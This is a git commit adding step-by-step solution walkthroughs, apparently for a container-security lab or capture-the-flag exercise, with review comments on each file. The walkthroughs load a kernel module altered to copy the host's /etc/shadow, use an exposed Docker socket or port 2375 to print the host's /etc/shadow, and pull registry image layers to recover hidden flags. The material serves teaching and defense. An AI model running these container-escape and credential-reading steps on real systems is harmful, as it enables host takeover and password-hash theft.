Mohit Gupta committed Oct 18, 2019
1 parent 0e70ea7 commit 6879fc0
Showing 5 changed files with 92 additions and 0 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
1) Get the container id for the kernel container so we can add files: | ||
|
||
docker ps | grep kernel | ||
|
||
The container id will be the first field | ||
|
||
2) Tweak exploit.c by replacing '/bin/echo foo > /bar' with '/bin/cp /etc/shadow /tmp/' | ||
|
||
3) Copy over exploit.c and Makefile to the container | ||
|
||
docker cp exploit.c <container id>:/ | ||
docker cp Makefile <container id>:/ | ||
|
||
4) Exec into the container | ||
|
||
docker-compose exec kernel bash | ||
|
||
5) Compile module | ||
|
||
make | ||
|
||
6) Load module | ||
|
||
insmod exploit.ko |
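Review bot: Step 6 ends at `insmod exploit.ko` with no statement of the expected result, so a reader cannot tell whether the exercise worked or where to look for the file that step 2's `/bin/cp /etc/shadow /tmp/` produces. Add a verification step that says which filesystem to check, and name the container setting in the compose file that the module load depends on, since that setting is what a defender would need to remove. Step 1 could also use the `kernel` service name as step 4 does rather than `docker ps | grep kernel`, and a closing `rmmod exploit` step would leave the lab host clean.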
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,19 @@ | ||
1) Exec into the backdoor container | ||
|
||
docker-compose exec backdoor sh | ||
|
||
2) Access the daemon within the UNIX socket in / and list running containers | ||
|
||
docker -H unix:///docker.sock ps | ||
|
||
3) Obtain the IP address of the containers gateway (the host) | ||
|
||
route -n | ||
|
||
4) Access the daemon through the host on TCP 2375 | ||
|
||
docker -H tcp://<host ip>:2375 ps | ||
|
||
5) Print /etc/shadow from the host | ||
|
||
docker -H unix:///docker.sock run --rm -v /etc:/host/ ubuntu cat /host/shadow |
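Review bot: Step 5 mounts the host's `/etc` read-write with `-v /etc:/host/` although the step only reads one file; use `-v /etc:/host/:ro` so a typo in the lab cannot alter host configuration. Step 5 also goes back to `unix:///docker.sock` after step 4 has just shown the TCP route, so say whether either endpoint works here. Step 3 should say which column of the `route -n` output holds the gateway, and "containers gateway" should read "container's gateway". A closing line on the fix (not mounting the daemon socket into the container and not exposing 2375 without TLS client authentication) would make the file useful to defenders as well.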
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,21 @@ | ||
1) Spawn an initial container | ||
|
||
docker run --rm -ti skybound/net-utils bash | ||
|
||
2) In a _separate_ terminal, obtain the container id of the container created within step 1 | ||
|
||
docker ps | ||
|
||
3) Spawn a second container that attaches onto the network stack of the first container | ||
|
||
docker run --rm -ti --net container:<container id> skybound/net-utils bash | ||
|
||
4) Spawn a netcat listener in the first container | ||
|
||
nc -nlvp 8080 | ||
|
||
5) Connect to the listening netcat from the second container | ||
|
||
nc -v localhost 8080 | ||
|
||
6) Type random gibberish and press enter in both terminals, and validate the data appears in the other terminal |
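Review bot: Step 2 relies on a bare `docker ps` in a second terminal and does not say which row to pick if other containers are running; giving the first container a name in step 1 (`--name`) would let step 3 use `--net container:<name>` and remove step 2 entirely. Step 6 should also state why the connection to `localhost` succeeds, namely that both containers share one network namespace, and what that implies for services in the first container that bind only to loopback.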
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
1) List available tags | ||
|
||
reg ls -f localhost:5000 | ||
|
||
2) Obtain the manifest of the first image and get the digest of the config | ||
|
||
reg manifest -f localhost:5000/supersecretimage:v1 | ||
|
||
3) Download the config and observe that a file was added to /lib/udev/docker.txt within the last layer | ||
|
||
reg layer -f localhost:5000/supersecretimage@<config digest from manifest> | jq | ||
|
||
4) Get the digest of the bottom layer from the manifest | ||
|
||
5) Download the bottom layer | ||
|
||
reg layer -f localhost:5000/supersecretimage@<layer digest from manifest> > layer.tar.gz | ||
|
||
6) Extract layer and cat lib/udev/docker.txt | ||
|
||
tar zxvf layer.tar.gz && cat lib/udev/docker.txt | ||
|
||
|
||
7) For the second image, the same steps can be followed to get to the config which contains the flag | ||
|
||
8) For the final flag, the config shows a file was added in the second to last layer and then deleted in the final, as such obtain the digest of the second from bottom layer from the manifest | ||
|
||
9) Download the layer as before, extract and view the contents of bin/something.txt |
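Review bot: Steps 3, 4, 8 and 9 mix "last layer", "bottom layer", "second to last layer" and "second from bottom layer" without saying whether they refer to position in the manifest's layer list or to the image stack, and step 4 has no command or sample output to disambiguate; pick one term and define it against the manifest order. Step 6's `tar zxvf layer.tar.gz` unpacks the whole layer into the current directory, so extract into a scratch directory or pull out only `lib/udev/docker.txt`. The `-f` flag appears on every `reg` command without explanation, and step 8 reads better split into two sentences. A short note that deleting a file in a later layer does not remove it from the earlier one would state the lesson of steps 8 and 9.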
Binary file not shown.